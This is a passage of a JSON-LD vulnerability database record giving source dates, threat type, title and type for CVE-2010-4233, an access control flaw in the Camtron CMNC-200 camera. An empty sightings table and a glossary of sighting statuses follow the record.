"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2010-11-18T00:00:00",
"db": "CNVD",
"id": "CNVD-2010-2887"
},
{
"date": "2010-11-17T00:00:00",
"db": "VULHUB",
"id": "VHN-46838"
},
{
"date": "2010-11-12T00:00:00",
"db": "BID",
"id": "44841"
},
{
"date": "2012-03-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2010-003392"
},
{
"date": "2010-11-12T23:06:03",
"db": "PACKETSTORM",
"id": "95794"
},
{
"date": "2010-11-17T01:00:03.963000",
"db": "NVD",
"id": "CVE-2010-4233"
},
{
"date": "2010-11-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201011-199"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2010-11-18T00:00:00",
"db": "CNVD",
"id": "CNVD-2010-2887"
},
{
"date": "2018-10-10T00:00:00",
"db": "VULHUB",
"id": "VHN-46838"
},
{
"date": "2010-11-18T11:06:00",
"db": "BID",
"id": "44841"
},
{
"date": "2012-03-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2010-003392"
},
{
"date": "2018-10-10T20:07:33.363000",
"db": "NVD",
"id": "CVE-2010-4233"
},
{
"date": "2010-11-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201011-199"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201011-199"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Camtron CMNC-200 Permissions and Access Control Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2010-2887"
},
{
"db": "CNNVD",
"id": "CNNVD-201011-199"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "trust management",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201011-199"
}
],
"trust": 0.6
}
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.